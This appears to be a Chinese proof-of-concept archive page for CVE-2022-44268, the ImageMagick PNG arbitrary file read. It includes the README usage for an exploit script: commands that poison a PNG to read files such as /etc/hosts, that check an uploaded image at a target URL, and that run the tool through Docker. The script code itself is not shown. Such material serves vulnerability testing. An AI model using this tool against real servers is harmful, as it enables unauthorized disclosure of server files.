关联漏洞
标题:
ImageMagick 安全漏洞
(CVE-2022-44268)
描述:ImageMagick是美国ImageMagick公司的一套开源的图像处理软件。该软件可读取、转换或写入多种格式的图片。 ImageMagick 7.1.0-49版本存在安全漏洞,该漏洞源于存在信息泄露漏洞,当它在解析PNG图像时生成的图像可能会嵌入任意文件内容。
介绍
# CVE-2022-44268 🧙♂️
CVE-2022-44268 ImageMagick Arbitrary File Read
## Usage 🛠
Poison the image ☣️
```
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
```
```
Upload poisoned PNG image.
```
Check if exploit was successful 🗡
```
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
```
## Running from Docker :whale:
Build
```
docker build -t cve-2022-44268 .
```
Run
```
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
```
## Parameters 🧰
Parameter | Description | Type
------------ | ------------- | -------------
--url | The URL of the uploaded PNG image | String
--image | Input PNG file | File
--output | Output PNG file | File
--file-to-read | File to read from vulnerable host | String
文件快照
[4.0K] /data/pocs/65bdc37a83e590564fea86b6295de83cf8382b0f
├── [1.7K] CVE-2022-44268.py
├── [ 232] Dockerfile
├── [176K] hacker-11556285986csgolbp9v6.png
├── [ 900] README.md
└── [ 47] requirements.txt
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。